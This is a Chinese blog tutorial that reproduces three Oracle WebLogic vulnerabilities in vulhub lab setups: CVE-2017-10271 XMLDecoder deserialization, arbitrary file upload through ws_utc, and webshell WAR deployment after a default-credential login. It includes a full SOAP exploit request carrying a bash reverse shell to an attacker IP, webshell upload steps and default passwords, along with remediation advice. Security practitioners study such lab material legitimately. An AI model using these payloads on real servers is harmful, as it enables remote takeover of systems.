Weblogic中间件漏洞合集

最新推荐文章于 2024-09-20 20:14:00 发布
最新推荐文章于 2024-09-20 20:14:00 发布
阅读量175 收藏
点赞数
文章标签: java 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77315080/article/details/133935206
版权

1、反序列化

2、任意文件上传

3、后台部署war包

1.Weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271)

1.漏洞描述

Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

2.漏洞涉及版本

10.3.6.0.0

12.1.3.0.0

12.2.1.1.0

12.2.1.2.0

3.环境搭建

在vulhub中使用docker拉取镜像,启动环境

docker-compose up -d

访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动

 

扫描路径发现可以访问访问http://192.168.0.130:7001/wls-wsat/CoordinatorPortType呈现如下页面,表示存在漏洞

4.复现过程

(1)使用工具

工具检测存在漏洞

(2)不使用工具

访问http://192.168.0.130:7001/wls-wsat/CoordinatorPortType

使用brupsuite抓包,

将get方式改为POST
将webshell替换上去

注意其中反弹shell的语句,需要进行编码,否则解析XML的时候将出现格式错误,

而且在请求头中要修改Content-Type的对应值为text/xml

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.0.130:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 633

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.0.119/4444 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

监听成功,连接成功可执行命令。

修复方法

1、更新Oracle相应补丁

2、对wls-wsat的资源访问在防火墙或路由器和交换机上做acl访问控制规则

3、在不影响业务的前提下删除相应war包

2.weblogic 任意文件上传漏洞

漏洞描述

weblogic管理端未授权的两个页面存在任意文件上传getshell漏洞,可直接获取webshell

受影响的版本
weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2、weblogic 12.2.1.3。

一、启动环境

docker-compose up -d

二、漏洞复现

执行如下命令可查看管理员密码,管理员用户名为weblogic,密码为pIeaMV7G

docker-compose logs | grep password

利用上面的账号密码登录weblogic

http://192.168.150.146:7001/console/login/LoginForm.jsp

登录后台页面,点击base_domain的配置,在 ‘高级’ 中勾选 ‘启用 Web 服务测试页’ 选项,然后保存配置。

访问http://192.168.150.146:7001/ws_utc/config.do,设置Work Home Dir为/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

然后点击 ‘安全’ -> ‘添加’ ,然后上传jsp大马

记录包中的时间戳

连接http://your-ip:7001/ws_utc/css/config/keystore/[时间戳]_[文件名],即可执行webshell

http://192.168.0.130:7001/ws_utc/css/config/keystore/1697639529121_ma1.jsp

密码admin

成功

修复建议:

(1)设置config.do,begin.do页面登录授权后才能访问
(2)更新产品版本,安装安全补丁

3.weblogic后台部署war包

1.漏洞原理

在搭建好 weblogic 服务后没有修改后台的默认密码或密码设置太简单,导致可以弱口令登录,最终获得服务器权限。

2.影响版本

Weblogic版本:10.3.6

Java版本:1.6

3.环境搭建

在vulhub中使用docker拉取镜像,启动环境

docker-compose up -d

访问http://your-ip:7001/即可看到一个404页面,说明weblogic已成功启动

进入后台http://192.168.0.116:7001/console/login/LoginForm.jsp

本环境存在弱口令:weblogic/Oracle@123

选择左侧的部署,然后点击安装

然后就可以看到有个上传文件的选项,这里可以上传一个 jsp类型的小马的 war包来拿到shell。

新建一个文件夹,里面只有 ma1.jsp 文件,输入命令:

jar -cvf test.war .

test.war 就是打包后生成的文件名称。

后面的. 是把当前目录下所有文件打包。

上传我们制作的 war 包,一直点击下一步

点击保存,提示更改成功,接下来就可以连接我们的上马了。

连接成功,这里 test 是我们的 war 包名,shell.jsp是里面的小马。

密码admin

4.防御和修复

1.设置Config.do页面登录授权后访问;
2.IPS等防御产品可以加入相应的特征;
3.升级到官方最新版本

不挖洞的鼹鼠
关注
weblogic中间件WLS(bea_wls_internal)组件敏感信息泄露漏洞整改
qq_31358379的博客
10-26 6064
近期负责的系统weblogic中间件bea_wls_internal被查出存在wls组件敏感信息泄露漏洞,访问漏洞地址如下: 针对上述漏洞,做过如下测试,整改未生效。 删除bea_wls_internal.war包,重启服务,服务无法启动,整改失败。 修改为weblogic域下的config.xml文件,在xml文件中<server>下添加标签<default-internal-servlets-disabled>true</default-internal-servle
合集】常见中间件漏洞
hackzkaq的博客
12-03 3025
1. IIS 1. PUT漏洞 用户配置不当,exp:https://github.com/hackping/HTTPMLScan.git 2. 短文件名猜解 IIS的短文件名机制,可以暴力猜解短文件名,访问构造的某个存在的短文件名,会返回404,访问构造的某个不存在的短文件名,返回400。 exp:https://github.com/WebBreacher/tilde_enum 3.远程代码执行(CVE-2017-7269)) **exp**:https://github.com/zcgonv
weblogic 10.3.6 安全补丁
04-08
weblogic 10.3.6版本的安全补丁,可以有效对反序列化安全进行修补,里面有具体的安装手册,都是自己安装成功后整理好的,直接安装步骤就可以安装成功
Weblogic中间件漏洞
最新发布
m0_75036923的博客
09-20 664
环境搭建漏洞复现 默认账号密码:weblogic/Oracle@123 weblogic常⽤弱⼝令:https://cirt.net/passwords?1.登录后台后,点击部署,点击安装,点击上传⽂件。2.上传war包,jsp⽊⻢压缩成zip,修改后缀为war,上传然后⼀直下⼀步3.访问部署好的war 192.168.0.115:7001/1/1.jsp。
weblogic10.3.6安装漏洞补丁
闹闹的博客
08-25 6432
安装Weblogic第一个补丁集p20780171_1036_Generic.zip更新10.3.6.0.12 1、获取Weblogic版本信息,版本截图信息如下: 2、上传p20780171_1036_Generic.zip到/app目录下 3、使用root用户解压p20780171_1036_Generic.zip到 /app,参考命令如下:
WebLogicWebLogic 10.3.6.0 十年补丁ID列表
cnskylee的博客
04-20 2832
Oracle WebLogic 10.3.6.0(11g版本)于2012年2月份发布,到2021年10月最后一次发布补丁,官方对该版本的技术支持生命周期,已经长达10年。该版本易于上手,功能强大,但是也存在一些问题而被用户吐槽,如:版本漏洞太多、每次更新累积补丁集,还需要写卸载上一次的累积补丁集,等等。尽管如此,该版本仍然是目前国内商用WebLogic中间件占比最多的版本。 附:WebLogic 10.3.6.0十年补丁ID汇总 PSU Description Patch ...
Weblogic10.3.6补丁升级
weixin_53150440的博客
03-29 2212
Weblogic10.3.6补丁升级
Weblogic RCE合集
Aiwin的博客
05-09 1701
Weblogic RCE合集
常见中间件漏洞总结PPT
01-25
WebLogic漏洞往往能够导致远程执行代码,例如它的t3协议和wls-wsat服务组件都曾被发现存在引起远程代码执行的反序列化漏洞。常见的WebLogic漏洞包括弱口令、SSRF(服务器端请求伪造)、任意文件上传和反序列化漏洞...
weblogic_tls及ssl类漏洞修复方案
05-18
WebLogic是Oracle公司提供的一个用于开发、集成、部署和管理大型分布式网络应用程序的中间件产品。 描述部分强调了weblogic_tls及ssl类漏洞的重要性,并指出修复方案主要分为两个部分:一是禁用弱加密算法,二是...
weblogic12c 漏洞 CVE-2018-2628补丁
07-23
2018最新weblogic反序列化漏洞补丁包 CVE-2018-2628补丁
Weblogic 常见漏洞分析与利用
未完成的歌~的博客
03-23 9452
一直没有系统的总结过 weblogic漏洞,今天通过 vulhub 靶场来复现几个经典的案例。WebLogic 是美国 Oracle 公司出品的一个基于 JAVAEE 架构的中间件,是用于开发、集成、部署和管理大型分布式 Web 应用、网络应用和数据库应用的Java应用服务器。WebLogic 由纯 Java 开发,长期以来一直被认为是市场上最好的J2EE工具之一,被广泛应用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。
weblogic中间件漏洞汇总
混子
11-24 9244
目录一、weblogic是什么?二、安装环境1、下载weblogic2、安装(其实就是点点点啦)三、反序列化漏洞1、XMLDecoder(CVE-2017-102712、XMLDecoder (CVE-2017-35063、wls-wsat远程代码执行(CVE-2019-27254、T3协议命令执行(CVE-2018-26285、 IIOP(CVE-2020-2551四、SSRF1、SSRF(CVE-2014-42102. SSRF联动Redis3、防御五、未授权访问1、Console HTTP协议远程代码
Weblogic常见漏洞详解
m0_64481831的博客
03-01 3905
Weblogic 是一个基于JavaEE架构的中间件,是用于开发、集成、部署和管理大型分布式为Web应用、网络应用和数据库应用的Java应用服务器。Weblogic由纯Java开发,被广泛应用于开发、部署和运行Java应用等适用于本地环境和云环境的企业应用。所以,Weblogic在面试当中被提到频率还蛮高的。这篇文章以vulhub靶场为辅。Weblogic中间件常见漏洞文章讲了任意文件读取和弱口令登录、未授权访问后台和HTTP请求远程代码执行、SSRF利用、XMLDecoder反序列化漏洞
深入浅出带你学习weblogic中间件常见漏洞
A_991128a的博客
01-01 953
WebLogic是美国Oracle公司出品的一个applicationserver,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。可以看到WEBLOGIC的作用还是非常大的,它的特点可以概括为下面五个点:1.标准性,支持多种标准。2.可扩展性,集群能力强。3.开发快,可以快速部署。4.灵活性强。5.可靠性强,安全性高。下面展开来讲weblogic中间件常见的漏洞以及利用方法。
漏洞复现】WebLogic中间件漏洞
qq_48368964的博客
08-06 1139
WebLogic是美国Oracle公司出品的⼀个application server,确切的说是⼀个基于JAVAEE架构的中间件,默认端⼝:7001 WebLogic是⽤于开发、集成、部署和管理⼤型分布式Web应⽤、⽹络应⽤和数据库应⽤的Java应⽤服务器。将Java的动态功能和Java Enterprise标准的安全性引⼊⼤型⽹络应⽤的开发、集成、部署和管理之中。
Weblogic中间件漏洞复现
mingyqf的博客
02-16 4035
1.Weblogic介绍 WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic是美商Oracle的主要产品之一,是并购BEA得来。是商业市场上主要的Java(J2EE)应用服务器软件(applic
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值